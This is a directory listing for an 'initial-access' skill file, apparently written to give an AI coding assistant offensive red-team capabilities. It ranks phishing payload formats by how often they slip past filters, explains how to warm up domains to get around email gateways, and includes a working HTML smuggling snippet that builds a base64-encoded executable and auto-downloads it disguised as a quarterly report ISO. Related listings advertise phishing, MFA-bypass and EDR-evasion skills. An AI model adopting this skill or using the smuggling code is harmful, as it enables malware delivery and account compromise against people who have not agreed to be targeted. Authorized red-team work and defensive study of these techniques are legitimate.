initial-access

Featured

Use when gaining initial access to a target — phishing, payload delivery, HTML smuggling, ISO/IMG/MOTW bypass, supply-chain, credential stuffing, exposed-service exploitation

AI & Automation 382 stars 66 forks Updated 5 days ago MIT

Install

View on GitHub

Quality Score: 95/100

Stars 20%
86
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
80
License 10%
100
Description 5%
100

Skill Content

# Initial Access ## When to Activate - Planning initial access phase of red team engagement - Developing phishing campaigns and payload delivery - Bypassing email gateways and endpoint protection - Exploiting exposed services for initial foothold ## Attack Vectors ### Email-Based (Phishing) **Payload Delivery Formats** (bypass probability): - `.exe` — almost always blocked - `.iso/.img` — bypasses MOTW (Mark of the Web) on older Windows - `.html` (smuggling) — high success rate - `.pdf` with embedded JS — moderate - `.one` (OneNote) — effective until patched - `.lnk` + DLL sideload — high success in ISO container - `.pptm/.ppsm/.accde` — often not covered by default protection **Domain Preparation**: - Domain age > 2 weeks (warm up with legitimate emails first) - Use HTTPS with valid certificate - Category: business/technology (not "newly registered") - SPF, DKIM, DMARC properly configured - Send legitimate emails first to build reputation ### HTML Smuggling ```html <!-- Construct binary blob in JavaScript, trigger download --> <html> <body> <script> function smuggle() { var bin = atob("TVqQAAMAAAAEAAAA..."); // base64 PE var blob = new Blob([new Uint8Array([...bin].map(c=>c.charCodeAt(0)))], {type: 'application/octet-stream'}); var url = URL.createObjectURL(blob); var a = document.createElement('a'); a.href = url; a.download = 'Report_Q4_2026.iso'; a.click(); } smuggle(); </script> <p>Loading document...</p> </body...

Details

Author
hypnguyen1209
Repository
hypnguyen1209/offensive-claude
Created
4 months ago
Last Updated
5 days ago
Language
Python
License
MIT

Bundled in these plugins

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Listed

initial-access

Initial access methodology for authorized red team engagements. Covers phishing, payload delivery, drive-by compromise, supply chain entry points, and living-off-the-land initial access techniques.

5 Updated yesterday
sunilgentyala
DevOps & Infrastructure Featured

red-team-ops

Use when running a full red-team engagement end-to-end — initial access, persistence, privilege escalation, defense evasion, C2 infrastructure, EDR bypass, living-off-the-land

382 Updated 5 days ago
hypnguyen1209
Web & Frontend Featured

offensive-phishing

Phishing campaign execution methodology for authorized red team engagements. Covers end-to-end campaign lifecycle: infrastructure provisioning (GoPhish, SMTP relay configuration, domain acquisition and aging, SPF/DKIM/DMARC alignment), payload delivery vectors (Office macro weaponization, HTA droppers, ISO/IMG container abuse, LNK shortcut hijacking, OneNote embedded payloads, HTML smuggling), email authentication bypass techniques (SPF softfail exploitation, DKIM replay attacks, display name spoofing, homoglyph and cousin domain registration), credential harvesting with MFA bypass (EvilGinx2 transparent proxy, Modlishka session relay, pixel-perfect HTML cloning), spear phishing pretext development informed by OSINT, email security gateway evasion, QR code phishing (quishing), and callback phishing for initial access. Integrates with GoPhish for campaign management, EvilGinx2 for adversary-in-the-middle credential interception, King Phisher for template design, and the Social Engineering Toolkit for payload g

6,950 Updated 6 days ago
SnailSploit